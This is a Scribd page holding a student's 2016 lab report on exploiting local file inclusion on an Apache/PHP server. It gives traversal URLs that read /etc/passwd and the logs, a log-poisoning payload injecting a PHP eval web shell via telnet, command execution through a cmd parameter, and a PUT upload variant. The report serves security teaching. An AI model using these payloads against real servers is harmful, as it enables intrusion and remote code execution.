Scribd Logo
Upload

Welcome to Scribd!

  • LFI Vulnerability

    Uploaded by

    Alfonso Velasco
    90 views7 pages
    This document summarizes an assignment to demonstrate and exploit a local file inclusion (LFI) vulnerability on an Apache server. The student first verifies the vulnerability by accessing the /etc/passwd file. They then find the Apache access and error log files to read server logs. Next, the student injects PHP code via a raw socket connection to execute commands by calling eval($_GET['cmd']). While a remote shell is not obtained, the exercise provides valuable security knowledge and the student intends to continue their work on this vulnerability.

    Original Description:

    vulnerabilidad de directori transversal a traves del log de acceso

    Original Title

    LFI vulnerability

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document summarizes an assignment to demonstrate and exploit a local file inclusion (LFI) vulnerability on an Apache server. The student first verifies the vulnerability by accessing the /etc/passwd file. They then find the Apache access and error log files to read server logs. Next, the student injects PHP code via a raw socket connection to execute commands by calling eval($_GET['cmd']). While a remote shell is not obtained, the exercise provides valuable security knowledge and the student intends to continue their work on this vulnerability.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    90 views7 pages

    LFI Vulnerability

    Uploaded by

    Alfonso Velasco
    This document summarizes an assignment to demonstrate and exploit a local file inclusion (LFI) vulnerability on an Apache server. The student first verifies the vulnerability by accessing the /etc/passwd file. They then find the Apache access and error log files to read server logs. Next, the student injects PHP code via a raw socket connection to execute commands by calling eval($_GET['cmd']). While a remote shell is not obtained, the exercise provides valuable security knowledge and the student intends to continue their work on this vulnerability.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 7

    Instituto Politcnico Nacional

    Escuela superior de Ingeniera Mecnica y Elctrica


    Unidad Culhuacn
    Seccin de Estudios de Posgrado e Investigacin

    Assignment: Local File Inclusion

    Student: Alfonso Enrique Velasco Ramrez


    Teacher: Steven Seeley
    Subject: Advanced PHP vulnerability analysis & exploitation

    Mxico D.F. 9 May 2016

    Objective
    Demonstrate and exploit the LFI vulnerability on an Apache Server through Apache
    Log Injection.

    Methods
    The first thing that is necessary to do is verify if the apache server that is the objective
    to the attack is vulnerable, thus we send a directory transversal attack in order to
    verify this, in the URL of the web application that are contain in the server we put the
    directory /etc/passwd at the final of the string like this:
    http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd
    %00
    The result of sending this URL is show below:

    Figure 1 Apache /etc/passwd contain

    The directory to which we agreed contains users and passwords that manages the
    Apache server that we are attacking, it also let us to know the OS on which the server
    is installed, in this case is FreeBSD.
    Once that we verify that the vulnerability exists in the server we proceed to search
    where is the access log located because we are going to use an Apache log injection
    attack, for this we access to the default distros layout:
    http://wiki.apache.org/httpd/DistrosDefaultLayout

    On this page we appreciate that the logs in the FreeBSD are in the var/log/ directory

    To continue with the attack we send other directory transversal attack but know in
    order to obtain the access logs, the URL that we are sending is:
    http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/http
    d-access.log%00
    The answer to this request is show below, we can see all the access logs that are
    contain in the server.

    Figure 3 Access logs on the Apache Server

    Another test that we can do is to try to get the Error logs of the server, for this we
    send the next request:
    192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpderror.log%00
    Below we can see that we also obtain the error logs of the apache server

    Figure 4 Error logs contains on the Apache Server

    Once that we found the logs of the server we proceed to inject PHP code to the
    server via a raw socket connection, in this case I use Telnet, once that we connect
    to the server we inject the PHP code that is below.
    GET /<?php eval($_GET[cmd]); ?> HTTP/1.1
    Where:
    GET Is using in order to the data that are send by the server as an answer to a
    request will be visible on the browser.
    Eval Evaluates a string as PHP code. The string must be valid PHP code and must
    end with semicolon. In this case eval let us execute commands cmd in the server.
    CMD Is the name of the variable that let us send data through GET
    The process to connect with the server and the injection of the code is show below.

    Figure 5 Connection with the server and code injection

    After the code injection we proceed to verify that it is function correctly by sending
    the follow URL
    http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/http
    d-access.log%00&cmd=phpinfo();%00
    The result of this request is show below (the cmd window is only for demonstrate
    that the request is send by my IP)

    Figure 6 PHPinfo obtain via LFI attack

    Once we are able to send cmd request we can obtain UID, PHPinfo, and the rc.conf
    data from the server, below I show the id and the rc.conf data

    Figure 7 Rc.conf directory

    Figure 8 Server UID

    Exists a lot of forms to inject code but most of all give us the same result, one of
    them is inject a .txt file via a raw socket with the PUT method, an example of it is
    show below:
    telnet 192.168.116.134 80
    trying to connect 192.168.116.134 80
    PUT /file_name.txt HTTP/1.1

    The content of the .txt file is the following php code


    <? include /eval($_GET[cmd]); ?>
    The code let us to obtain the server info via apache commands like the previous
    process that I explain before.

    Conclusions
    The development of this exercise wasnt successful because I couldnt obtain a
    remote shell, despite this the knowledge obtain is very valuable because from this
    attack a lot of attacks can be done and consequently prevent allowing an
    improvement to the security student. Personally I will continue with this exercise and
    I hope to achieve the full objective and share to the teacher.

    You might also like